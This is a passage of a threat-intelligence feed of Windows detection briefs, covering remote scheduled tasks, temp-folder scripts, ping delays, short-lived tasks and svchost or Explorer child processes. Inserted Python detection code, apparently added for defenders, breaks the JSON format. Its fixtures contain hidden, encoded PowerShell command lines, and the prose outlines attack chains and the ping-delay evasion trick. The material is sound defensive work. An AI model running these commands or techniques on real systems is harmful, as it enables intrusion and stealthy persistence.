responding to potential intrusions. 
The rule focuses on inbound network connections accepted by svchost.exe, which hosts the Task Scheduler RPC endpoint on the target, followed by registry modifications related to task actions.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker gains initial access to a system, potentially through phishing or exploiting a vulnerability.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the compromised system to scan the network for potential targets.\u003c/li\u003e\n\u003cli\u003eThe attacker attempts to authenticate to a target Windows host using stolen credentials or by exploiting a vulnerability in a network service.\u003c/li\u003e\n\u003cli\u003eThe attacker connects to the target host\u0026rsquo;s Task Scheduler RPC endpoint. On the target this endpoint is hosted in svchost.exe, so the telemetry shows svchost.exe accepting an inbound connection on a port in the dynamic range (49152 and above) from a non-local address.\u003c/li\u003e\n\u003cli\u003eThe attacker creates a new scheduled task on the target system using the Task Scheduler service.\u003c/li\u003e\n\u003cli\u003eThis creation involves modifying the registry key \u003ccode\u003eHKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\{TaskID}\\Actions\u003c/code\u003e to define the task\u0026rsquo;s actions. The \u0026lsquo;Actions\u0026rsquo; value is a binary blob; Elastic registry events surface it base64 encoded in \u003ccode\u003eregistry.data.bytes\u003c/code\u003e, so it must be decoded before the configured command can be read.\u003c/li\u003e\n\u003cli\u003eThe scheduled task executes a malicious payload, granting the attacker further access or control over the target system.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the newly gained access for lateral movement, data exfiltration, or other malicious objectives.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation can lead to unauthorized access to sensitive systems, data breaches, and further lateral movement within the network. 
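The recommendation to review the base64 encoded Actions value is easier to follow with a decoder at hand. The block below is an added example for this brief, not Elastic's rule or investigation guide code: it decodes the base64 form of the value as a registry event delivers it, recovers the length-prefixed UTF-16LE strings (program, arguments, working directory) and, if the arguments carry an -EncodedCommand, decodes that too. The sample blob is constructed here; its field layout (version, author, exec marker, id, flags, then the three strings) is an approximation for the demonstration only, and the parser does not depend on it beyond the 4-byte-length-plus-UTF-16LE string encoding.

```python
import base64
import re
import struct

# A run of four or more (printable ASCII, NUL) byte pairs is how a UTF-16LE string
# looks inside a binary blob; this is the strings -el style fallback.
UTF16_RUN = re.compile(b'(?:[ -~]\x00){4,}')


def carve_utf16le(blob):
    '''Fallback: return every printable UTF-16LE run of four or more characters.
    Layout-independent, but a printable length byte of the next field can get
    glued onto the end of a string, so the length-aware parser is preferred.'''
    return [m.group(0).decode('utf-16-le') for m in UTF16_RUN.finditer(blob)]


def parse_length_prefixed_strings(blob, max_bytes=4096):
    '''Walk the blob looking for a little-endian u32 byte length followed by that
    many bytes of printable UTF-16LE; emit the string and resume after it. This
    matches how the strings inside the Actions value are stored and avoids the
    glued-length-byte problem of plain carving.'''
    out, i = [], 0
    while i + 4 <= len(blob):
        n = struct.unpack_from('<I', blob, i)[0]
        if 2 <= n <= max_bytes and n % 2 == 0 and i + 4 + n <= len(blob):
            chunk = blob[i + 4:i + 4 + n]
            if all(0x20 <= chunk[k] <= 0x7e and chunk[k + 1] == 0 for k in range(0, n, 2)):
                out.append(chunk.decode('utf-16-le'))
                i += 4 + n
                continue
        i += 1
    return out


def decode_actions_value(b64_value):
    '''registry.data.bytes carries the raw value base64 encoded: decode, then parse.'''
    blob = base64.b64decode(b64_value)
    return parse_length_prefixed_strings(blob) or carve_utf16le(blob)


ENCODED_CMD = re.compile(r'-e(?:c|nc|ncodedcommand)?[ ]+([a-z0-9+/=]{8,})', re.IGNORECASE)
EXE_EXTS = ('.exe', '.dll', '.bat', '.cmd', '.ps1', '.vbs', '.js', '.hta')


def summarize_action(strings):
    '''Heuristic triage: the first string that looks like a program path is the
    command; the strings after it (arguments, working directory) are kept in
    order. An -EncodedCommand argument is decoded from UTF-16LE base64.'''
    program, trailing = None, []
    for s in strings:
        if program is None and s.lower().endswith(EXE_EXTS):
            program = s
        elif program is not None:
            trailing.append(s)
    encoded = None
    for s in trailing:
        m = ENCODED_CMD.search(s)
        if m:
            try:
                encoded = base64.b64decode(m.group(1)).decode('utf-16-le')
            except (ValueError, UnicodeDecodeError):
                encoded = None
            break
    return {'program': program, 'after_program': trailing, 'encoded_command': encoded}


def _bstr(text):
    data = text.encode('utf-16-le')
    return struct.pack('<I', len(data)) + data


def sample_event_value():
    '''Base64 form of a constructed Actions blob (layout is an approximation).'''
    blob = (struct.pack('<H', 3)
            + _bstr('Author')
            + struct.pack('<H', 0x6666)         # exec-action marker
            + _bstr('')                          # action id
            + struct.pack('<I', 0)               # flags
            + _bstr('C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe')
            + _bstr('-nop -w hidden -enc SQBFAFgA')
            + _bstr('C:\\Users\\Public'))
    return base64.b64encode(blob).decode('ascii')


if __name__ == '__main__':
    strings = decode_actions_value(sample_event_value())
    print(strings)
    print(summarize_action(strings))
```

Run against a real event, feed the registry.data.bytes field to decode_actions_value and read the program and arguments from the summary; a PowerShell command with -w hidden and an encoded payload in a task that was created over the network is the combination worth escalating.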
The rule is designed to catch this activity, reducing the dwell time of attackers and minimizing potential damage.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the provided Sigma rules to your SIEM and tune for your environment to detect malicious scheduled task creation.\u003c/li\u003e\n\u003cli\u003eEnable Sysmon Event ID 3 (Network Connection) and Sysmon Registry Events to enhance visibility into network connections and registry modifications (see Setup instructions).\u003c/li\u003e\n\u003cli\u003eReview the base64 encoded tasks actions registry value to investigate the task configured action (see rule description).\u003c/li\u003e\n\u003cli\u003eInvestigate any alerts generated by the Sigma rule to determine the legitimacy of the scheduled task creation and the intent behind the configured action.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T10:00:00Z","date_published":"2024-01-03T10:00:00Z","id":"/briefs/2024-01-remote-scheduled-task-creation/","summary":"This rule identifies remote scheduled task creations on a target Windows host, potentially indicating lateral movement by adversaries, by monitoring network connections and registry modifications related to task scheduling.","title":"Detecting Remote Scheduled Task Creation for Lateral Movement","url":"https://feed.craftedsignal.io/briefs/2024-01-remote-scheduled-task-creation/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":true,"_cs_products":["Windows"],"_cs_severities":["high"],"_cs_tags":["execution","script","temp"],"_cs_type":"threat","_cs_vendors":["Microsoft"],"content_html":"\u003cp\u003eThis detection identifies suspicious script executions originating from temporary directories. Threat actors often leverage temporary folders to stage and execute malicious scripts, such as PowerShell, VBScript, or even HTML applications (MSHTA) to evade detection or bypass security controls. 
These scripts can be delivered through various means, including phishing attacks, drive-by downloads, or as part of a multi-stage malware infection. The execution of scripts from temporary directories is generally uncommon for legitimate software, making it a valuable indicator of potentially malicious activity. This detection focuses on identifying processes like powershell.exe, pwsh.exe, mshta.exe, wscript.exe, and cscript.exe executing from or referencing standard temporary paths in their command line.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eA malicious script (e.g., PowerShell, VBScript) is downloaded or dropped into a temporary directory such as \u003ccode\u003eC:\\Windows\\Temp\u003c/code\u003e, \u003ccode\u003e\\AppData\\Local\\Temp\u003c/code\u003e, or similar.\u003c/li\u003e\n\u003cli\u003eThe attacker uses a process like \u003ccode\u003ecmd.exe\u003c/code\u003e or \u003ccode\u003epowershell.exe\u003c/code\u003e to invoke the downloaded script.\u003c/li\u003e\n\u003cli\u003eThe script executes, potentially performing reconnaissance, privilege escalation, or lateral movement.\u003c/li\u003e\n\u003cli\u003eThe script may download additional payloads from a remote server.\u003c/li\u003e\n\u003cli\u003eThe script establishes persistence through registry modification or scheduled tasks.\u003c/li\u003e\n\u003cli\u003eThe script performs malicious actions such as data exfiltration or ransomware deployment.\u003c/li\u003e\n\u003cli\u003eThe attacker attempts to remove the initial script files to cover their tracks.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation can lead to a range of consequences, including data theft, system compromise, and ransomware infection. 
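Both this brief and the preceding one, on executable or script creation in suspicious paths, reduce to the same building block: normalise a Windows path and test it against a list of directories where that kind of file does not belong. The block below is an added example for both briefs, not the Sigma rules themselves or any vendor code. It handles Sysmon Event ID 11 (file creation) for the first brief and Event ID 1 (process creation) for this one, is drive- and case-insensitive, and expands the page's directory lists with a few more well-known atypical locations; treat those lists and the single allow-listed installer as a starting point to tune. The sample events are constructed.

```python
import posixpath

# Extensions whose creation outside program directories deserves a look.
EXECUTABLE_EXTS = {'.exe', '.dll', '.sys', '.scr', '.com', '.ps1', '.bat', '.cmd', '.vbs', '.js', '.hta'}

# Directory fragments that legitimate software almost never writes executables to.
# Drive-agnostic and lower-cased; extend with what your estate tells you is atypical.
SUSPICIOUS_WRITE_DIRS = (
    '/windows/fonts/', '/windows/debug/', '/windows/help/', '/windows/tasks/',
    '/windows/addins/', '/users/public/', '/perflogs/', '/$recycle.bin/',
)

# Script engines and the temporary paths the temp-folder brief watches for.
SCRIPT_ENGINES = {'powershell.exe', 'pwsh.exe', 'mshta.exe', 'wscript.exe', 'cscript.exe'}
TEMP_D = ('/windows/temp/', '/appdata/local/temp/', '%temp%', '%tmp%')

# Creators whose writes to the watched directories are expected: the tuning hook
# for known-good installers, populated here with one example entry only.
ALLOWED_CREATORS = {'/windows/system32/msiexec.exe'}


def normalize(text):
    '''Lower-case, forward-slash form so matching is case- and drive-insensitive.'''
    return text.replace('\\', '/').lower()


def suspicious_file_creation(target, creator_image):
    '''Sysmon EventID 11: an executable or script written into an atypical directory.'''
    t = normalize(target)
    if posixpath.splitext(t)[1] not in EXECUTABLE_EXTS:
        return None
    creator = normalize(creator_image)
    if any(creator.endswith(a) for a in ALLOWED_CREATORS):
        return None
    for d in SUSPICIOUS_WRITE_DIRS:
        if d in t:
            return 'executable written to ' + d
    return None


def suspicious_script_execution(image, command_line):
    '''Sysmon EventID 1: a script engine started from, or pointed at, a temp path.'''
    img = normalize(image)
    if posixpath.basename(img) not in SCRIPT_ENGINES:
        return None
    haystack = img + ' ' + normalize(command_line)
    for d in TEMP_D:
        if d in haystack:
            return 'script engine referencing ' + d
    return None


def evaluate(event):
    '''Dispatch on the Sysmon event id; returns a reason string or None.'''
    if event['EventID'] == 11:
        return suspicious_file_creation(event['TargetFilename'], event['Image'])
    if event['EventID'] == 1:
        return suspicious_script_execution(event['Image'], event['CommandLine'])
    return None


# Constructed sample events; field names follow Sysmon's, values are invented.
SAMPLE_EVENTS = [
    {'EventID': 11, 'Image': 'C:\\Users\\alice\\Downloads\\invoice.exe',
     'TargetFilename': 'C:\\Windows\\Fonts\\svchost.exe'},
    {'EventID': 11, 'Image': 'C:\\Windows\\System32\\msiexec.exe',
     'TargetFilename': 'C:\\Users\\Public\\setup.dll'},                      # allow-listed creator
    {'EventID': 11, 'Image': 'C:\\Windows\\explorer.exe',
     'TargetFilename': 'C:\\Users\\Public\\notes.txt'},                      # not an executable
    {'EventID': 1, 'Image': 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe',
     'CommandLine': 'powershell.exe -ep bypass -f C:\\Users\\alice\\AppData\\Local\\Temp\\upd.ps1'},
    {'EventID': 1, 'Image': 'C:\\Windows\\System32\\mshta.exe',
     'CommandLine': 'mshta.exe %TEMP%\\page.hta'},
    {'EventID': 1, 'Image': 'C:\\Windows\\System32\\cmd.exe',
     'CommandLine': 'cmd.exe /c C:\\Windows\\Temp\\a.bat'},                  # cmd.exe is outside this rule
    {'EventID': 1, 'Image': 'C:\\Windows\\System32\\wscript.exe',
     'CommandLine': 'wscript.exe C:\\Scripts\\logon.vbs'},                  # not a temp path
]

if __name__ == '__main__':
    for ev in SAMPLE_EVENTS:
        print(ev['EventID'], evaluate(ev))
```

The creator allow-list keys on the image path only; in production pair it with the signer or hash of the creating process, since an attacker can drop a binary named msiexec.exe anywhere writable.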
The execution of malicious scripts from temporary directories can provide attackers with a foothold in the network, allowing them to move laterally, escalate privileges, and ultimately achieve their objectives. Depending on the script\u0026rsquo;s capabilities, it could also lead to system instability or denial of service.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Suspicious Script Execution From Temp Folder\u0026rdquo; to your SIEM to detect script execution from temporary directories. Tune the rule\u0026rsquo;s filters for known-good software installers in your environment to reduce false positives.\u003c/li\u003e\n\u003cli\u003eEnable process creation logging with command line arguments to capture the necessary information for the Sigma rule (logsource: process_creation).\u003c/li\u003e\n\u003cli\u003eInvestigate any alerts generated by the Sigma rule, focusing on the parent process and the script\u0026rsquo;s actions.\u003c/li\u003e\n\u003cli\u003eImplement application control policies to restrict the execution of scripts from temporary directories where possible.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-02T14:30:00Z","date_published":"2024-01-02T14:30:00Z","id":"/briefs/2024-01-script-exec-temp/","summary":"This brief covers a detection for suspicious script execution, such as PowerShell, WScript, or MSHTA, originating from common temporary directories, potentially indicating malware activity.","title":"Suspicious Script Execution from Temporary Directory","url":"https://feed.craftedsignal.io/briefs/2024-01-script-exec-temp/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Windows"],"_cs_severities":["low"],"_cs_tags":["execution","defense-evasion","windows","ping","lolbas"],"_cs_type":"advisory","_cs_vendors":["Microsoft"],"content_html":"\u003cp\u003eAttackers may use ping to introduce pauses, allowing them to 
execute harmful scripts or binaries stealthily. This delayed execution is often observed during malware installation and is consistent with an attacker attempting to evade detection. The adversary uses \u003ccode\u003eping.exe\u003c/code\u003e with the \u003ccode\u003e-n\u003c/code\u003e argument from within a \u003ccode\u003ecmd.exe\u003c/code\u003e shell, and the parent process is running under a user context other than SYSTEM. The subsequent process is \u003ccode\u003ecmd.exe\u003c/code\u003e invoking a commonly abused Windows utility, such as \u003ccode\u003epowershell.exe\u003c/code\u003e, \u003ccode\u003emshta.exe\u003c/code\u003e, \u003ccode\u003erundll32.exe\u003c/code\u003e, or an executable from the user\u0026rsquo;s AppData directory without a valid code signature.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attack begins with an initial access vector (not specified in source).\u003c/li\u003e\n\u003cli\u003eThe adversary executes \u003ccode\u003ecmd.exe\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ecmd.exe\u003c/code\u003e spawns \u003ccode\u003eping.exe\u003c/code\u003e with the \u003ccode\u003e-n\u003c/code\u003e argument to introduce a delay, typically to evade detection (\u003ccode\u003eping.exe -n [number] 127.0.0.1\u003c/code\u003e; each echo to the loopback address costs roughly a second, so the count sets the sleep length without calling any sleep API).\u003c/li\u003e\n\u003cli\u003eAfter the delay introduced by \u003ccode\u003eping.exe\u003c/code\u003e, the same \u003ccode\u003ecmd.exe\u003c/code\u003e process executes a potentially malicious utility such as \u003ccode\u003epowershell.exe\u003c/code\u003e, \u003ccode\u003emshta.exe\u003c/code\u003e, \u003ccode\u003erundll32.exe\u003c/code\u003e, \u003ccode\u003ecertutil.exe\u003c/code\u003e, or \u003ccode\u003eregsvr32.exe\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eAlternatively, \u003ccode\u003ecmd.exe\u003c/code\u003e might execute a binary located within the 
user\u0026rsquo;s AppData directory that lacks a valid code signature.\u003c/li\u003e\n\u003cli\u003eThe malicious utility executes arbitrary commands or scripts, potentially downloading further payloads or modifying system configurations.\u003c/li\u003e\n\u003cli\u003eThe attacker gains a foothold on the system, enabling further malicious activities such as lateral movement or data exfiltration.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eA successful attack can lead to malware installation, system compromise, and data theft. While the source does not quantify the number of victims or specific sectors targeted, a successful compromise can lead to significant operational disruption and data breaches. The use of delayed execution makes it more difficult for traditional security solutions to detect malicious activity.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Delayed Execution via Ping\u0026rdquo; to your SIEM to detect the execution of commonly abused Windows utilities via a delayed Ping execution.\u003c/li\u003e\n\u003cli\u003eEnable process monitoring with command-line argument logging to capture the execution of \u003ccode\u003eping.exe\u003c/code\u003e and subsequent processes for analysis.\u003c/li\u003e\n\u003cli\u003eImplement application whitelisting to prevent unauthorized execution of scripts and binaries, focusing on the utilities identified in the rule.\u003c/li\u003e\n\u003cli\u003eReview and tune the provided Sigma rule, including the listed exclusions, to reduce false positives in your specific environment.\u003c/li\u003e\n\u003cli\u003eMonitor process execution from unusual locations like the AppData directory, especially for unsigned executables, as indicated in the rule\u0026rsquo;s detection 
logic.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-02T14:00:00Z","date_published":"2024-01-02T14:00:00Z","id":"/briefs/2024-01-delayed-execution-via-ping/","summary":"Adversaries may use ping to delay execution of malicious commands, scripts, or binaries to evade detection, often observed during malware installation.","title":"Windows Delayed Execution via Ping Followed by Malicious Utilities","url":"https://feed.craftedsignal.io/briefs/2024-01-delayed-execution-via-ping/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Windows"],"_cs_severities":["medium"],"_cs_tags":["persistence","execution","windows"],"_cs_type":"advisory","_cs_vendors":["Microsoft"],"content_html":"\u003cp\u003eThis detection focuses on identifying the creation and subsequent deletion of scheduled tasks within a short timeframe on Windows systems. Attackers may abuse the scheduled task functionality to execute malicious code, establish persistence, or perform other unauthorized actions. By quickly deleting the task after execution, they attempt to evade detection and remove traces of their activity. This behavior is often associated with attackers trying to proxy malicious execution via the schedule service and then cleaning up to avoid leaving forensic artifacts. The detection logic looks for the sequence of task creation followed by deletion within a five-minute window. This activity is captured via Windows Security Event Logs when the \u0026ldquo;Audit Other Object Access Events\u0026rdquo; setting is enabled.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains initial access to the target system. 
\u003c/li\u003e\n\u003cli\u003eThe attacker uses legitimate Windows utilities like \u003ccode\u003eschtasks.exe\u003c/code\u003e or PowerShell cmdlets to create a new scheduled task (T1053.005).\u003c/li\u003e\n\u003cli\u003eThe scheduled task is configured to execute a malicious payload, such as a script or executable. The payload could be staged on disk or downloaded from a remote server.\u003c/li\u003e\n\u003cli\u003eThe scheduled task executes the malicious payload, achieving the attacker\u0026rsquo;s objective (e.g., establishing persistence, executing commands, or deploying malware).\u003c/li\u003e\n\u003cli\u003eThe attacker, or the malicious payload itself, uses \u003ccode\u003eschtasks.exe\u003c/code\u003e or PowerShell to delete the scheduled task.\u003c/li\u003e\n\u003cli\u003eThe deletion occurs within a short time (less than 5 minutes) after task creation to minimize the window for detection.\u003c/li\u003e\n\u003cli\u003eThe attacker may also delete associated log files or other artifacts to further cover their tracks.\u003c/li\u003e\n\u003cli\u003eThe attacker achieves their objective, such as maintaining persistence, escalating privileges, or exfiltrating data.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation can lead to persistent access, arbitrary code execution, privilege escalation, and data compromise. While the specific impact varies depending on the attacker\u0026rsquo;s objectives, the ability to execute code via scheduled tasks provides a significant foothold within the compromised system. 
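The five-minute creation-to-deletion sequence is a time-window join over two Security events: with "Audit Other Object Access Events" enabled, task creation is logged as Event ID 4698 and deletion as 4699, and 4698 embeds the task XML so the configured command can be pulled out at the same time. The block below is an added example for this brief, not the vendor's Sigma rule; the events are constructed records with the field names flattened from the Windows XML (Computer, TaskName, SubjectUserName, TimeCreated, TaskContent), and the task XML inside them is invented.

```python
import re
import xml.etree.ElementTree as ET
from datetime import datetime, timedelta

WINDOW = timedelta(minutes=5)          # the brief's creation-to-deletion window
XML_DECL = re.compile(r'^\s*<\?xml[^>]*\?>')


def _ts(value):
    '''Parse an ISO-8601 timestamp such as 2024-01-02T12:00:10Z into an aware datetime.'''
    return datetime.fromisoformat(value.replace('Z', '+00:00'))


def task_command(task_content):
    '''Pull <Command> and <Arguments> out of the task XML a 4698 event embeds.
    The embedded XML declares encoding="UTF-16", which no longer matches the str
    the log pipeline hands us, so the declaration is dropped before parsing.'''
    if not task_content:
        return None
    try:
        root = ET.fromstring(XML_DECL.sub('', task_content, count=1))
    except ET.ParseError:
        return None
    found = {}
    for el in root.iter():
        tag = el.tag.rsplit('}', 1)[-1]        # strip the schema namespace
        if tag in ('Command', 'Arguments'):
            found[tag] = (el.text or '').strip()
    return found or None


def find_short_lived_tasks(events, window=WINDOW):
    '''Pair each 4699 (task deleted) with the latest 4698 (task created) for the
    same host and task name, and report pairs whose gap is within the window.'''
    pending, hits = {}, []
    for ev in sorted(events, key=lambda e: _ts(e['TimeCreated'])):
        key = (ev['Computer'], ev['TaskName'].lower())
        if ev['EventID'] == 4698:
            pending[key] = ev
        elif ev['EventID'] == 4699 and key in pending:
            created = pending.pop(key)
            gap = _ts(ev['TimeCreated']) - _ts(created['TimeCreated'])
            if gap <= window:
                hits.append({
                    'computer': ev['Computer'],
                    'task': ev['TaskName'],
                    'created_by': created['SubjectUserName'],
                    'deleted_by': ev['SubjectUserName'],
                    'seconds_alive': int(gap.total_seconds()),
                    'action': task_command(created.get('TaskContent')),
                })
    return hits


# Constructed sample records; not real telemetry.
TASK_XML = ('<?xml version="1.0" encoding="UTF-16"?>'
            '<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">'
            '<Actions Context="Author"><Exec><Command>powershell.exe</Command>'
            '<Arguments>-nop -w hidden -enc SQBFAFgA</Arguments></Exec></Actions></Task>')

SAMPLE_EVENTS = [
    {'EventID': 4698, 'Computer': 'WS01', 'TaskName': '\\Updater', 'SubjectUserName': 'alice',
     'TimeCreated': '2024-01-02T12:00:10Z', 'TaskContent': TASK_XML},
    {'EventID': 4699, 'Computer': 'WS01', 'TaskName': '\\Updater', 'SubjectUserName': 'alice',
     'TimeCreated': '2024-01-02T12:03:40Z'},                                  # 210 s later: fires
    {'EventID': 4698, 'Computer': 'WS01', 'TaskName': '\\Backup', 'SubjectUserName': 'svc_backup',
     'TimeCreated': '2024-01-02T12:05:00Z', 'TaskContent': TASK_XML},
    {'EventID': 4699, 'Computer': 'WS01', 'TaskName': '\\Backup', 'SubjectUserName': 'svc_backup',
     'TimeCreated': '2024-01-02T12:20:00Z'},                                  # 15 min: outside window
    {'EventID': 4699, 'Computer': 'WS02', 'TaskName': '\\Orphan', 'SubjectUserName': 'bob',
     'TimeCreated': '2024-01-02T12:30:00Z'},                                  # no matching creation
]

if __name__ == '__main__':
    for hit in find_short_lived_tasks(SAMPLE_EVENTS):
        print(hit)
```

Keying on host and task name means a task that is re-created under the same name replaces the pending entry, which is the behaviour you want for a loader that retries; if you need every pair, keep a list per key instead of a single event.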
This can lead to lateral movement, data exfiltration, or further compromise of the network.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eEnable \u0026ldquo;Audit Other Object Access Events\u0026rdquo; in Windows Security Event Logs to generate the necessary events for detection.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Temporarily Scheduled Task Creation\u0026rdquo; to your SIEM to detect rapid task creation and deletion.\u003c/li\u003e\n\u003cli\u003eInvestigate any alerts generated by the Sigma rule to determine if the activity is legitimate or malicious.\u003c/li\u003e\n\u003cli\u003eMonitor scheduled task creation events for unusual task names, command-line arguments, or user accounts.\u003c/li\u003e\n\u003cli\u003eImplement application control policies to restrict the execution of unauthorized executables and scripts.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-02T12:00:00Z","date_published":"2024-01-02T12:00:00Z","id":"/briefs/2024-01-temp-scheduled-task/","summary":"Detection of rapid creation and deletion of scheduled tasks on Windows, indicating potential malicious activity abusing the task scheduler for execution and cleanup.","title":"Windows Temporarily Scheduled Task Creation and Deletion","url":"https://feed.craftedsignal.io/briefs/2024-01-temp-scheduled-task/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["medium"],"_cs_tags":["execution","windows","process_injection","privilege_escalation"],"_cs_type":"advisory","_cs_vendors":["Microsoft"],"content_html":"\u003cp\u003eThe Service Host process (svchost.exe) is a legitimate Windows system process designed to host multiple Windows services. It is not intended to be used by non-Windows services or to spawn command interpreters directly. This detection focuses on identifying instances where cmd.exe is launched as a child process of svchost.exe. 
This activity is highly suspicious and may suggest that a malicious process is masquerading as svchost.exe or that an attacker has gained control and is attempting privilege escalation or lateral movement within the compromised system. The rule leverages process monitoring logs to identify this anomalous parent-child relationship. The original Elastic detection rule was published in 2020, and updated in May 2026.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eInitial Compromise: An attacker gains initial access to a Windows system through various means, such as exploiting a vulnerability or using stolen credentials.\u003c/li\u003e\n\u003cli\u003ePrivilege Escalation: The attacker attempts to escalate privileges to gain higher-level access to the system.\u003c/li\u003e\n\u003cli\u003eService Exploitation: The attacker exploits a service hosted by svchost.exe or injects malicious code into a service process.\u003c/li\u003e\n\u003cli\u003eCommand Execution: The attacker leverages the compromised service to spawn cmd.exe as a child process of svchost.exe.\u003c/li\u003e\n\u003cli\u003eReconnaissance: The attacker uses cmd.exe to perform reconnaissance activities, such as gathering system information or network configuration details.\u003c/li\u003e\n\u003cli\u003eLateral Movement: The attacker uses cmd.exe to move laterally to other systems on the network, potentially using stolen credentials or exploiting vulnerabilities.\u003c/li\u003e\n\u003cli\u003ePersistence: The attacker establishes persistence on the compromised system to maintain access even after a reboot.\u003c/li\u003e\n\u003cli\u003eData Exfiltration or System Damage: The attacker exfiltrates sensitive data from the compromised system or damages the system to disrupt operations.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eA successful attack can lead to privilege escalation, lateral movement, 
data theft, or system compromise. The impact could range from minor data breaches to significant disruptions of business operations, depending on the attacker\u0026rsquo;s objectives and the extent of the compromise. Since svchost.exe is a critical system process, any compromise could result in widespread damage across the affected system.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the \u0026ldquo;Svchost spawning Cmd\u0026rdquo; Sigma rule to your SIEM to detect this suspicious parent-child relationship.\u003c/li\u003e\n\u003cli\u003eEnable process monitoring with command-line logging on Windows endpoints to provide the necessary data for the Sigma rule to function.\u003c/li\u003e\n\u003cli\u003eInvestigate any alerts generated by the Sigma rule to determine the root cause and scope of the compromise.\u003c/li\u003e\n\u003cli\u003eReview and harden the security configuration of Windows services to prevent exploitation.\u003c/li\u003e\n\u003cli\u003eEnforce the principle of least privilege to limit the impact of a compromised service account.\u003c/li\u003e\n\u003cli\u003eUse threat intelligence platforms to identify and block known malicious indicators associated with svchost.exe exploits.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-02T12:00:00Z","date_published":"2024-01-02T12:00:00Z","id":"/briefs/2024-01-svchost-cmd-spawn/","summary":"Detection of cmd.exe being spawned by svchost.exe, which is an unusual behavior indicative of potential masquerading or privilege escalation attempts on Windows systems.","title":"Suspicious Svchost.exe Child Process: cmd.exe","url":"https://feed.craftedsignal.io/briefs/2024-01-svchost-cmd-spawn/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Microsoft Defender XDR","Elastic Defend","SentinelOne Cloud 
Funnel"],"_cs_severities":["medium"],"_cs_tags":["initial-access","defense-evasion","execution","explorer.exe","dcom"],"_cs_type":"advisory","_cs_vendors":["Microsoft","Elastic","SentinelOne"],"content_html":"\u003cp\u003eAttackers frequently abuse Windows Explorer (explorer.exe) to execute malicious code due to its inherent trust within the operating system. This involves spawning child processes such as PowerShell, cmd.exe, or other scripting engines via Component Object Model (COM) and Distributed Component Object Model (DCOM). This technique enables attackers to bypass security controls, blending malicious activity with legitimate system processes. The detection rule identifies such anomalies by monitoring child processes of Explorer with specific characteristics, excluding known benign activities, to flag potential threats. This activity is frequently associated with initial access and execution of follow-on malware.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attack begins with an initial access vector such as spearphishing (T1566).\u003c/li\u003e\n\u003cli\u003eA user clicks a malicious link or opens an attachment, leading to code execution.\u003c/li\u003e\n\u003cli\u003eThe initial payload activates, over DCOM, a shell COM object that Explorer hosts; COM may launch a separate explorer.exe with the -Embedding argument to serve the request, and that argument is what distinguishes this instance from the user\u0026rsquo;s desktop shell.\u003c/li\u003e\n\u003cli\u003eExplorer.exe spawns a child process such as powershell.exe, cmd.exe, or mshta.exe (T1059, T1218).\u003c/li\u003e\n\u003cli\u003eThe spawned process executes malicious commands or scripts.\u003c/li\u003e\n\u003cli\u003eThese commands might download or execute additional payloads.\u003c/li\u003e\n\u003cli\u003eThe attacker achieves code execution, potentially gaining persistence on the system.\u003c/li\u003e\n\u003cli\u003eThe ultimate objective is often lateral movement, data exfiltration, 